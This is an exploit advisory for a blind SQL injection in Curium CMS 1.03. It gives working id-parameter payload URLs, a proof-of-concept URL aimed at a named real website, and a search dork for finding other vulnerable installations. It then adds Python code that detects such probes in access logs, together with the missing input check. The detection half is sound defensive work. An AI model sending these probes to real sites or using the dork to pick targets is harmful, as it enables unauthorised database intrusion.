[o] dB Masters' Curium CMS 1.03 Blind SQL Injection Vulnerability
Software : dB Masters' Curium CMS version 1.03
Vendor : http://www.dbmasters.net/
Author : NoGe
[o] Vulnerable file
index.php
[o] Exploit
http://localhost/[path]/index.php?id=[SQL]
http://localhost/[path]/index.php?id=1 and substring(@@version,1,1)=4
http://localhost/[path]/index.php?id=1 and substring(@@version,1,1)=5
[o] Proof Of Concept
http://www.scacheerleaders.com/index.php?id=43%20and%20substring(@@version,1,1)=4
[o] Dork
"Powered by dB Masters' Curium CMS"
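[o] Detection (added example)
The following Python is an added example, not part of the original advisory and not Curium CMS code. It scans web access logs for requests to index.php whose id parameter is not a plain integer and flags the boolean probe shape shown under Exploit. The log lines, IP addresses, response sizes and the /cms/ path are constructed, and the keyword list is an assumed heuristic.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed combined-format access-log lines (documentation IPs, made-up sizes).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /cms/index.php?id=43 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2024:10:00:05 +0000] "GET /cms/index.php?id=43%20and%20substring(@@version,1,1)=4 HTTP/1.1" 200 1024',
    '203.0.113.9 - - [01/Jan/2024:10:00:06 +0000] "GET /cms/index.php?id=43+AND+SUBSTRING(@@version,1,1)=5 HTTP/1.1" 200 5120',
    '203.0.113.8 - - [01/Jan/2024:10:00:09 +0000] "GET /cms/about.php?id=abc HTTP/1.1" 200 900',
]

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3}) (\d+|-)')
# Boolean connective followed by a string/version/timing function: the probe shape above.
BLIND_RE = re.compile(r'\b(and|or)\b.*(substring|substr|mid|ascii|@@version|sleep|benchmark)', re.I)

def classify_id(value):
    """Return 'ok', 'blind-sqli' or 'non-numeric' for a decoded id value."""
    if re.fullmatch(r'\d+', value):
        return 'ok'
    return 'blind-sqli' if BLIND_RE.search(value) else 'non-numeric'

def scan(lines, script='index.php'):
    """Return (client, verdict, decoded id, response size) for suspicious requests."""
    findings = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target, _status, size = m.groups()
        url = urlsplit(target)
        if not url.path.endswith('/' + script):
            continue
        for value in parse_qs(url.query, keep_blank_values=True).get('id', []):
            verdict = classify_id(value)
            if verdict != 'ok':
                findings.append((client, verdict, value, size))
    return findings

def oracle_clients(findings):
    """Clients whose blind probes got differing response sizes (true/false oracle)."""
    sizes = {}
    for client, verdict, _value, size in findings:
        if verdict == 'blind-sqli':
            sizes.setdefault(client, set()).add(size)
    return sorted(c for c, s in sizes.items() if len(s) > 1)

if __name__ == '__main__':
    for finding in scan(SAMPLE_LOG):
        print(finding)
    print('oracle observed by:', oracle_clients(scan(SAMPLE_LOG)))
```

The same integer-only test used in classify_id is the input check index.php lacks: an id that is not all digits should be rejected before it reaches the query.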